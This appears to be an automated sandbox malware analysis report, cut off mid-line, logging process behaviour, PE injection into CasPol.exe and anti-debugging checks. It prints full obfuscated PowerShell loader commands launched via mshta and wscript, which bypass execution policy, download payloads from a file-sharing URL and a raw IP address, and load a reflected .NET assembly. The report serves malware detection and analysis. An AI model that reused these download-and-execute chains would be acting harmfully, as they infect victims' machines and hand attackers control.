                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3452Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\mshta.exe TID: 3608Thread sleep time: -300000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 723 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep count: 1774 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep time: -240000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep count: 880 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872Thread sleep count: 1868 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3880Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1964Thread sleep count: 2156 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 896Thread sleep count: 4730 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1392Thread sleep time: -15679732462653109s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1392Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1392Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 804Thread sleep count: 57 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4028Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,34_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,34_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,34_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044D5E9 FindFirstFileExA,34_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,34_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406AC2 FindFirstFileW,FindNextFileW,34_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,34_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,34_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,34_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,34_2_00406F06
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89B03122 rdtsc 6_2_000007FE89B03122
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,34_2_0041BCE3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00442554 mov eax, dword ptr fs:[00000030h]34_2_00442554
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0044E92E GetProcessHeap,34_2_0044E92E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433CD7 SetUnhandledExceptionFilter,34_2_00433CD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,34_2_00434168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_0043A65D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00433B44

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1712, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe34_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00418754 mouse_event,34_2_00418754
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENTJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB76D.tmp" "c:\Users\user\AppData\Local\Temp\qvgum1lr\CSC3E3F8E93A6CD4B728B9027B482B0AFC2.TMP"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICR2ZXJCb1NlcHJFRmVyZU5DZS5UT3N0ckluRygpWzEsM10rJ1gnLUpPaU4nJykoKCdvcGlpbWFnZVVybCA9IGlmZGh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0JysnNXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9JysnZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgaWZkO29waXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7b3BpaW1hZ2VCeXRlcyA9IG9waXdlYkNsaWVudC5Eb3dubG9hZERhdGEob3BpaW1hZ2VVcmwpO29waWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKG8nKydwaWltYWdlQnl0ZXMpO29waXN0YXJ0RmxhZyA9IGlmZDw8QkFTRTY0X1NUQVJUPj5pZmQ7b3BpZW5kRmxhZyA9IGlmZDw8QkFTRTY0X0VORD4+aWZkO29waXN0YXJ0SW5kZXggPSBvcGlpbWFnZVRleHQuSW5kZXhPZihvJysncGlzJysndGFydEZsYWcpO29waWVuZEluZGV4ID0gb3BpaW1hZ2VUZXh0LkluZGV4T2Yob3BpZW5kRmxhZyk7b3Bpc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIG9waWVuZEluZGV4IC1ndCBvcGlzdGFydEluZGUnKyd4O29waXN0YXJ0SW5kZXggKz0gb3Bpc3RhcnRGbGFnLkxlbmd0aDtvcCcrJ2liYXNlNjRMZW5ndGggPSBvcGllbmRJbmRleCAtIG9waXN0YXJ0SW5kZXg7b3BpYmFzZTY0Q29tbWFuZCA9IG9waWltYWdlVGV4dC5TdWJzdCcrJ3Jpbmcob3Bpc3RhcnQnKydJbmRleCwgb3BpYmFzZTY0TGVuZ3RoKTtvcGliYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChvcGliYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgMFEnKydsIEZvckVhY2gtT2JqZWN0IHsgb3BpXyB9KVsnKyctMS4uLShvcGliYXNlNjRDb21tYW5kLkxlbmd0aCldO29waWNvbW1hbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udicrJ2UnKydydF06OkZyb21CYXNlJysnNjRTdHJpbmcob3BpYmFzZTY0UmV2ZXJzZWQpO29waWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW8nKyduLkFzc2VtYmx5XTo6TG9hZChvcGljb21tYW5kQnl0ZXMpO29waXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoaWYnKydkVkFJaWZkJysnKTtvcGl2YWlNZXRob2QuSW52b2tlKG9waW51bGwsIEAoaWZkdHh0LkdERFJESC81NC85Mi4nKycwMjIuMy4yOTEvLzpwdHRoaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRkZXNhdGl2YWRvaWZkLCBpZmRDYXNQb2xpZmQsIGlmZGRlc2F0aXYnKydhZG8nKydpZmQsIGlmZGRlc2F0JysnaXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdGl2YWRvaWZkLGlmZGRlc2F0aXZhZG9pZmQsaWZkZGVzYXRpdmFkb2lmZCxpZmRkZXNhdCcrJ2l2YWRvaWZkLGlmZDFpZmQsaWZkZGVzYXRpdmFkb2lmJysnZCkpOycpLnJlUExBQ2UoJzBRbCcsW1N0cmluR11bQ2hBcl0xMjQpLnJlUExBQ2UoJ2lmZCcsW1N0cmluR11bQ2hBcl0zOSkucmVQTEFDZSgoW0NoQXJdMTExK1tDaEFyXTExMitbQ2hBcl0xMDUpLCckJykp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; 